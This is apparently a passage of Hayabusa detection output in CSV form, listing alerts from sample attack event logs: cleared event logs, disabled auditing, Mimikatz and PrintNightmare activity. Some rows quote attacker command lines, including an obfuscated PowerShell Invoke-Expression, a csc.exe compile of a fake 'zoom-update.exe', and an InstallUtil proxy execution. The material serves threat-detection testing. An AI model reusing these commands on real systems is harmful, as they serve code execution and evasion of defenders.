admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.778 
+09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event 
logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: 
admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,System log file was cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx +2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 
+09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit 
policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit 
policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server 
installation (PrintNightmare).evtx" +2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-28 
22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs : Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1218.004,technique_name=InstallUtil : Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker 